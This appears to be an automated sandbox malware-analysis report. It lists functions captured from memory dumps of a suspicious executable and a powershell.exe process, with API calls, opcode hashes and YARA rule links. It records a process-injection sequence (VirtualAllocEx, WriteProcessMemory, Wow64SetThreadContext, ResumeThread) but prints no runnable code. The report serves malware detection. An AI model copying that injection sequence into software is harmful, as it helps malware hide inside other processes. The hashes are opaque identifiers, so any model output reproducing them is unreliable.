                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: dd78df2d883a7f376450920f7c37dcbdaa82a5b556985c6bb97680983af2ad77
                                                                                            • Instruction ID: fa621f28c65c1765dfd54da2b92189665e3423dfc01ddc03848494b2c9d58ebe
                                                                                            • Opcode Fuzzy Hash: dd78df2d883a7f376450920f7c37dcbdaa82a5b556985c6bb97680983af2ad77
                                                                                            • Instruction Fuzzy Hash: AA016271900601ABE314DF16DC46B26FBA4FB88B20F14815AED095B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 4ac70f728083c1aa99309a6bc53b06eb4add87f28164d13376f17b4a77d06ec9
                                                                                            • Instruction ID: e39a1bcea23ca5317b1937c72008ffa634dd7c08bd7d7e48d3e7a2bc1469bed3
                                                                                            • Opcode Fuzzy Hash: 4ac70f728083c1aa99309a6bc53b06eb4add87f28164d13376f17b4a77d06ec9
                                                                                            • Instruction Fuzzy Hash: 3401DF79904308CFEB10CF15D885B66FB94EF00625F08C5AADE09CF682E778E404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: eadcf94b401d8863860dcf38631934537370870a9fe9538f1c8aafefc42d3199
                                                                                            • Instruction ID: a89d005f0bd5a08e4f09ad11eebf3c02b09710e67489a8a106e858ab73d3987d
                                                                                            • Opcode Fuzzy Hash: eadcf94b401d8863860dcf38631934537370870a9fe9538f1c8aafefc42d3199
                                                                                            • Instruction Fuzzy Hash: C001F479500708CFEB108F15D885766FBA0DF41725F08C0AADE0B8B752D774E804DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 020AABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 8ee5c51b4ab5d13a0a4f9fec9691c2ed6e589bf09b97fac5f61301cceaa835a2
                                                                                            • Instruction ID: 3e011cf1de63483e6d14fdc503661ded77dce61501f71bcb00d46e02e1cd84be
                                                                                            • Opcode Fuzzy Hash: 8ee5c51b4ab5d13a0a4f9fec9691c2ed6e589bf09b97fac5f61301cceaa835a2
                                                                                            • Instruction Fuzzy Hash: B001D171514340DFEB10DF95DC85795FBA4EF00621F48C4AADD0A8F282D275A404CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02841116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 4adc7758d43fb4e13493981e1289f4ed13419e8124e20ef3ae158a1af23e697d
                                                                                            • Instruction ID: 34bb7318ce91269476505d174dbdbe42643f4d93bd141eb8cec0d1a9a160cafe
                                                                                            • Opcode Fuzzy Hash: 4adc7758d43fb4e13493981e1289f4ed13419e8124e20ef3ae158a1af23e697d
                                                                                            • Instruction Fuzzy Hash: 14F0F438500748DFEB20CF05D889765FB90DF00A21F08C09ADD0D8B312D675A484CA62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: ae0722cdd372f4231e53bcf5e9a0cf9e728c304b5f9b668c9149eca5fc328fec
                                                                                            • Instruction ID: c77105327bffb6dddd34b511a43dd500d4239449260e671489ac99b55b890885
                                                                                            • Opcode Fuzzy Hash: ae0722cdd372f4231e53bcf5e9a0cf9e728c304b5f9b668c9149eca5fc328fec
                                                                                            • Instruction Fuzzy Hash: EEF0C236604744DFEB20DF46D8C5769FBA0EF04721F88C09AED494B352D375A908DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: f33fa1b514afcb49a4aac8f2688e894f614a2250d4fce3048915ca62e55fb698
                                                                                            • Instruction ID: 2eaca1970826d96993c4f437c9c1ceb960c59a41f3ecc7f93f3f98e623e2c21d
                                                                                            • Opcode Fuzzy Hash: f33fa1b514afcb49a4aac8f2688e894f614a2250d4fce3048915ca62e55fb698
                                                                                            • Instruction Fuzzy Hash: EFF0C239904748DFFB20DF15D889766FFA0EF14726F08C09ADE498B316D775A504CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 020AAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: e48a4b05a77659a4126ee6c2c9b34217ecbf0bcf1dc08baf76ecf09341e8d10e
                                                                                            • Instruction ID: 8c03147e01311ed5f38b8970cfd613cbad8e210311a9cdee71beb1590ef1b245
                                                                                            • Opcode Fuzzy Hash: e48a4b05a77659a4126ee6c2c9b34217ecbf0bcf1dc08baf76ecf09341e8d10e
                                                                                            • Instruction Fuzzy Hash: 74F0CD32A04744CFEB10CF45D989766FBE0EF14621F88C09ADD0A4B292D378A504DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 020AA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: bb98c0790c53670f20a5c809c5cbf1fe342c9963e757484f694fa5d8189ee5c4
                                                                                            • Instruction ID: c4de0427654888631bf56aba019a6310f2f801d9d892069b7596c67ca0967dd7
                                                                                            • Opcode Fuzzy Hash: bb98c0790c53670f20a5c809c5cbf1fe342c9963e757484f694fa5d8189ee5c4
                                                                                            • Instruction Fuzzy Hash: 9911A3715093849FD712CF65DC55B96FFF4DF02221F0980EBED468B262D275A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 020AA9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 8367f737c0a7a66927b1748c22ca1ec87f8f8d499c7f4d96a63fc69fb9696e47
                                                                                            • Instruction ID: f5979273cb400c1cca59180d35162f1bad231809ac803e8e500df8072d11bad1
                                                                                            • Opcode Fuzzy Hash: 8367f737c0a7a66927b1748c22ca1ec87f8f8d499c7f4d96a63fc69fb9696e47
                                                                                            • Instruction Fuzzy Hash: 7C01F271600740CFEB10DF55DC857AAFBE4EF00621F48C0ABDD0A8B682D375A804DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028607F7, Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117229242.0000000002860000.00000040.00000040.sdmp, Offset: 02860000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7fa38a5e3ddf40218a73393013d5df0e3c9280512bed2a0c4989e2231fc9f9fc
                                                                                            • Instruction ID: 53db8490554708353d28d8e046be22f50fcdee67924ee19f069120290314e0d7
                                                                                            • Opcode Fuzzy Hash: 7fa38a5e3ddf40218a73393013d5df0e3c9280512bed2a0c4989e2231fc9f9fc
                                                                                            • Instruction Fuzzy Hash: 0101D4B6509380AFDB11CB02DC41866FFB8EE86660718C09FEC49CB612D229A905CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05710810, Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2130034300.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b3ab5a4dc5b7e1959a3dd3437a307ab7a9e43b11f9d0ecd94eea8f993ffff61
                                                                                            • Instruction ID: e1d5beb2388a777722b0962e1eecf7a408326c9b1c6426beafd7450bfc8034ba
                                                                                            • Opcode Fuzzy Hash: 2b3ab5a4dc5b7e1959a3dd3437a307ab7a9e43b11f9d0ecd94eea8f993ffff61
                                                                                            • Instruction Fuzzy Hash: 8BF0901114D3D05FC31753A85C698A57F329E8711034E02DBD491CF1E7DA054885E3BE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0286081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117229242.0000000002860000.00000040.00000040.sdmp, Offset: 02860000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a991feb323782a46f0e739636f0c2fb9db27dde5f8cfff92cebdb8e5b0a8798
                                                                                            • Instruction ID: f1915df5e45e4551685994c87e1d19368d07cd07d4d7d3f2c64d1c1fc62f8107
                                                                                            • Opcode Fuzzy Hash: 2a991feb323782a46f0e739636f0c2fb9db27dde5f8cfff92cebdb8e5b0a8798
                                                                                            • Instruction Fuzzy Hash: 1EE09276A047048BDB50CF0AEC41856F794EB84A31B58C07FDC0E8B710E139B504CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020A23F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113781722.00000000020A2000.00000040.00000001.sdmp, Offset: 020A2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d6b4c1ecc76775a7df64e1ee48bb31152727bf1806112440c197ecc0247590c
                                                                                            • Instruction ID: 259cee8ee592dddbe0e8a1ae11408551e6bf696831703ba19167fdf16b8bbeb0
                                                                                            • Opcode Fuzzy Hash: 9d6b4c1ecc76775a7df64e1ee48bb31152727bf1806112440c197ecc0247590c
                                                                                            • Instruction Fuzzy Hash: C1D05E79204B818FD7178A1CC1A4B9537D4AF55B08F8644F9EC40CB6A3C768E5D1E200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020A23BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113781722.00000000020A2000.00000040.00000001.sdmp, Offset: 020A2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9b7cfaa28f418286e0dd69d0299128c48fc7add2c194cc891850b87fb3f8ab2
                                                                                            • Instruction ID: 9a2e9b75ff41378612751a3a9a95b6cf5e19a5c19e57528c92a32bea56d0b112
                                                                                            • Opcode Fuzzy Hash: d9b7cfaa28f418286e0dd69d0299128c48fc7add2c194cc891850b87fb3f8ab2
                                                                                            • Instruction Fuzzy Hash: 53D05E353007818FDB16CA1CC1E4F5973E4AF41704F4644F8BC008B266C3A8E880D600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2900 Parent PID: 1696 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 00353B30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00353BB6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID: I7
                                                                                            • API String ID: 983334009-3638510524
                                                                                            • Opcode ID: 25bcea1cf78cf028d0d870ca22a4e7a5c8c637691f4061a9cbee80a6ad1c38db
                                                                                            • Instruction ID: 37cd3c2f4f35d73e25db8bd60e199173b8e7d0dbe1cc00ca793ca4ab04420fce
                                                                                            • Opcode Fuzzy Hash: 25bcea1cf78cf028d0d870ca22a4e7a5c8c637691f4061a9cbee80a6ad1c38db
                                                                                            • Instruction Fuzzy Hash: 3A216A75D002098FDB10CFAAC484BEEBBF5EF48314F64882ED859A7240D778AA44CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00351888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 003518A8
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 003518BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 2d6558ba21886f92f4e1f4a1a7b6a7abe127d5a27ab129560d17661cbe4ff9f9
                                                                                            • Instruction ID: a85fcb57e9f8be376f8f40a949c713458db99452ae26db1bd64a78c9076d2e33
                                                                                            • Opcode Fuzzy Hash: 2d6558ba21886f92f4e1f4a1a7b6a7abe127d5a27ab129560d17661cbe4ff9f9
                                                                                            • Instruction Fuzzy Hash: 36E04FB0E002088FC744EFA8E85451E7BF4F748700B1055ABD809D3758E7705D61CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00354B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00354D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 0adcf212877fca32f1bdd13b4fad5882990b0941dd812c8b27c3ffb57f0ae58d
                                                                                            • Instruction ID: f4822907ddb0d92a9f910e90c38fb2ddb905faf4ed0df1a1da2384b61920f031
                                                                                            • Opcode Fuzzy Hash: 0adcf212877fca32f1bdd13b4fad5882990b0941dd812c8b27c3ffb57f0ae58d
                                                                                            • Instruction Fuzzy Hash: 31918C71D00219DFDF15CFA8C841BEEBBB2BF84309F158569E848A7290DB749989CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 003542D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00354360
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 76d960e973d923e1c65252569d17e143f7d8c821ba49a8eb33ebb31b530c5682
                                                                                            • Instruction ID: df1ee790d0809e6fb84356271593098ea93f1d171d96d8c5a124a5b60dc09ac8
                                                                                            • Opcode Fuzzy Hash: 76d960e973d923e1c65252569d17e143f7d8c821ba49a8eb33ebb31b530c5682
                                                                                            • Instruction Fuzzy Hash: CF2127759003099FCB10CFA9C885BDEBBF5FF48314F50882AE959A7250D778AA54CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 003545B9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00354640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 016e94c5ba54e1612b3b9d99ca19587ea0ee7e44df4bb7c3ac76a56203fad794
                                                                                            • Instruction ID: 03b1624df2c42d1933a376c999b2fcdb4bcd8bd30a1d6b431c8f05f01cdd0b79
                                                                                            • Opcode Fuzzy Hash: 016e94c5ba54e1612b3b9d99ca19587ea0ee7e44df4bb7c3ac76a56203fad794
                                                                                            • Instruction Fuzzy Hash: 9B212771D003499FCB10CFA9C844BEEFBF5BF48314F54882AE959A7250D7789944CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 003545C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00354640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: fd4d21aafec455369af22dc366487e52140273fae79707bbe9608a7505271b45
                                                                                            • Instruction ID: 293247ce25c6059f3f60e9766e14c24d10bc0cf094f0cc426c9c369117c0e9ab
                                                                                            • Opcode Fuzzy Hash: fd4d21aafec455369af22dc366487e52140273fae79707bbe9608a7505271b45
                                                                                            • Instruction Fuzzy Hash: 8E212871D002099FCB10CFA9C884BEEFBF5FF48314F50882AE959A7240D778A944CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00353B38, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00353BB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: b6a321c8eb6bd0f146f16ad619ac44ee8aec93d81e8fd356ec0040abfdfae104
                                                                                            • Instruction ID: aac312141b3e6b370ab8e3178d4181637edae99962361afcec578c332d14db42
                                                                                            • Opcode Fuzzy Hash: b6a321c8eb6bd0f146f16ad619ac44ee8aec93d81e8fd356ec0040abfdfae104
                                                                                            • Instruction Fuzzy Hash: E7214C71D002098FDB10CFA9C4447EEFBF5EF48354F54882AD959A7240D778AA44CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00354010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0035407E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 21ed7661626a2b8553b7aaa07992ca8925c3076f24d5ec614e5871e52f01dffb
                                                                                            • Instruction ID: 598eeb2b4a93e731e32436ae8578be5b1489b2f2bc8993bfd94ddecbc877ecb1
                                                                                            • Opcode Fuzzy Hash: 21ed7661626a2b8553b7aaa07992ca8925c3076f24d5ec614e5871e52f01dffb
                                                                                            • Instruction Fuzzy Hash: BC113A759002089FDB10CFA9D844BDFFBF9AF48314F248819E959A7250C775A944CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00355590, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 038f86d55b844f3900ff241c96bfb14a0c6439cceb2f0b3133393f6aef8bdde1
                                                                                            • Instruction ID: 83648c145ea64ba21d474ef629648730d434801ee202c5dc3ad99a42f0f71f26
                                                                                            • Opcode Fuzzy Hash: 038f86d55b844f3900ff241c96bfb14a0c6439cceb2f0b3133393f6aef8bdde1
                                                                                            • Instruction Fuzzy Hash: 23116AB5D046488FDB10CFA9C8447EFFBF6AF88314F24891AD559A7250C778AA04CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00355598, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166962488.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: eb00598061d0ced8325e145ab0b28387a7122193f36d22fbcb35938c8b876c8b
                                                                                            • Instruction ID: 9d7b794dea6db59ed889dcd1f42fef3efd1bc119f5cb127fc7e030bbcb2f1ac2
                                                                                            • Opcode Fuzzy Hash: eb00598061d0ced8325e145ab0b28387a7122193f36d22fbcb35938c8b876c8b
                                                                                            • Instruction Fuzzy Hash: B0114CB5D006488FDB10DFAAC4447EFFBF9AF88314F24881AD559A7240D778A944CF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0010D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166241377.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 455ae870df6be8b0bef6f32217b4d7074ceb6942dff5e9a57ec9a0769274fee1
                                                                                            • Instruction ID: c9a25c0b41ab8ddef4025d5f299ef478df1e5eb21fbf72a9c646885d656d6be8
                                                                                            • Opcode Fuzzy Hash: 455ae870df6be8b0bef6f32217b4d7074ceb6942dff5e9a57ec9a0769274fee1
                                                                                            • Instruction Fuzzy Hash: 46210775604204DFDB14DF94E884B16BBA5FB84314F34C969E88D4B28AC377D807CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0010D017, Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2166241377.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24c3f5bb668936d2efe1fd5f391589a95ba7ff612a20b3a2dc726edd9804e952
                                                                                            • Instruction ID: b31a5f5ba7cada2a965442c0d912f3d7bb358c98bb407de72a11cba815025f03
                                                                                            • Opcode Fuzzy Hash: 24c3f5bb668936d2efe1fd5f391589a95ba7ff612a20b3a2dc726edd9804e952
                                                                                            • Instruction Fuzzy Hash: 9A11D075504284CFCB11CF54E5C4B15FF61FB44314F24C6A9E8494B69AC37AD80BCBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 3060 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01D0ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 2ffd7ef6862b49d1591124f1265968d31fef28a14653e374dc6697b512d7c58c
                                                                                            • Instruction ID: f42ab6ece1df140358c08d2d741d0f6b36f46c2e104dc19a88924bea11c6f1f5
                                                                                            • Opcode Fuzzy Hash: 2ffd7ef6862b49d1591124f1265968d31fef28a14653e374dc6697b512d7c58c
                                                                                            • Instruction Fuzzy Hash: EA21D3755097809FEB238F29DC44B92BFB4EF06310F0984DAE9848B1A3D3319908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2125276460.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 83c7be43187ca64f893e93f2975b951ab9e9959f4bd2a499f2dc5cabedcb930e
                                                                                            • Instruction ID: 906df0a741f4d67cc78632c0201fc83ea4b8354a4041a65762ebdae0a94b617c
                                                                                            • Opcode Fuzzy Hash: 83c7be43187ca64f893e93f2975b951ab9e9959f4bd2a499f2dc5cabedcb930e
                                                                                            • Instruction Fuzzy Hash: 9F117076500744DFEB22CF59D884B96FBE4EF08221F08C46AED498B662E371E414DB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01D0B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
